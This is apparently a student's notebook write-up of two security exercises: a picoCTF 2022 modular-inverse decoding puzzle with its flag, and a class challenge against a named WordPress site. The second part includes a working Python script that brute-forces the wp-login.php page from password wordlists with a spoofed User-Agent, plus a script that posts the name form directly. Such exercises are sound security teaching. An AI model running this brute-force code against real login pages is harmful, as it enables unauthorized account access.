# Group A
# Guilherme Pereira

# picoCTF 2022 - basic-mod2

In [ ]:
alpha = list(map(chr, range(ord('a'), ord('z')+1)))
f = open("message.txt", "r")
lines = f.readlines()[0]
res = ""
for l in lines.split():
    r = pow(int(l), -1, 41)

    if r in range(1, 27):
        res += alpha[r-1]
    elif r in range(27, 37):
        dig = r - 27
        res += str(dig)
    else:
        res += "_"
print(res)
# picoCTF{1nv3r53ly_h4rd_c680bdc1}

# H4K1NG Challenge:
Please try to use psswrd 4ttk on this website. This website is mine and I allow you to run this only for educational purposes. DO NOT use this on any other website without permission or you can go to jail.

There is a weak username, intentionally made this way. Try to see if you can figure the password out.

The username is: cybersecurity

After successfully entering the website, you will be redirected to the home page, then you can click on a button named "Go to submit page" and by doing that you will be redirected to another page where you can submit your name. Click on "Submit Your Name", upon clicking, you would be asked to put your name there and then submit. At last, you can logout and be done with this challenge.

Initially I started the challenge with a brute force attack under the domain https://rs11.glorifykickstarter.com/wp-login.php. For this task I used the "rockyou.txt" and two simple password wordlists. Although, brute forcing was infeasible since after several consecutive atempts the server would automatically raise a 406 HTTP status code (Not Acceptable), essentially applying a time constraint with each login attempt. 

In [ ]:
# Code used to brute force wordpress login
from os.path import isfile, join
from os import listdir
import requests

wp_login = 'https://rs11.glorifykickstarter.com/wp-login.php'
wp_admin = 'https://rs11.glorifykickstarter.com/wp-admin/'
username = 'cybersecurity'
PSSWD_PATH = "passwd/"
password_files = [f for f in listdir(PSSWD_PATH) if isfile(join(PSSWD_PATH, f))]

def loop():
    with requests.Session() as s:
        for f in password_files:
            plist = open(PSSWD_PATH+f, "r")
            for pwd in plist.readlines():
                req(s, pwd)

def req(s, pwd):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
    }
    data = {
        'log': username, 'pwd': pwd, 'wp-submit': 'Log In',
        'redirect_to': wp_admin
    }
    r = s.post(wp_login, headers=headers, data=data, allow_redirects=False)

    if r.status_code in [302, 303]:
        print("hit")
    elif r.status_code == 200:
        print("no hit")
    else:
        print("error")

    print("status: " + str(r.status_code) +" ; passwd: " + pwd)

After further analysis of the WordPress website, embedded JavaScript code was found in the /names_cs index (HTML) page. This code renders the popup used to submit our name, using the "form" tags. By copying the returned "form" tags into a new HTML index page and analyzing the code, it was verifiable that if somehow we could replicate this form submit then a single POST method could be sent to https://rs11.glorifykickstarter.com/names_cs/ with the respective body parameters and my name would be present in the database. In this POST method, my name was wrapped around the 'mf-names' field, since this was the input (div) name in the respective form.

In [ ]:
def single():
    with requests.Session() as s:
        names_cs_post(s)

    # Not a GET request since names_cs page has submit button (embedded html) within form.
    # Form sends POST request on submit, assuming ` onSubmit=${ validation.handleSubmit( parent.handleFormSubmit ) } ` -> is a POST method.
def names_cs_post(s):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
    }
    data = {
        'mf-names': 'Guilherme Pereira'
    }
    r = s.post('https://rs11.glorifykickstarter.com/names_cs', headers=headers, data=data, allow_redirects=False)
    
    print("response cookies: " + str(r.cookies))
    print("\t---")
    print("headers: " + str(r.headers))
    print("\t---")
    print("status: " + str(r.status_code))

    ch = input("Parse HTML ? (y)\t")
    if ch == 'y':
        parse_html(r)

def parse_html(r):
    from bs4 import BeautifulSoup

    c = r.content
    soup = BeautifulSoup(c, 'html.parser')
    print(soup)

References:
    -   https://stackoverflow.com/questions/42002336/using-python-requests-module-to-login-on-an-wordpress-based-website
    -   https://stackoverflow.com/questions/42596483/how-to-login-to-wordpress-with-python-with-requests
    -   https://stackoverflow.com/questions/43562550/login-wordpress-with-requests-python3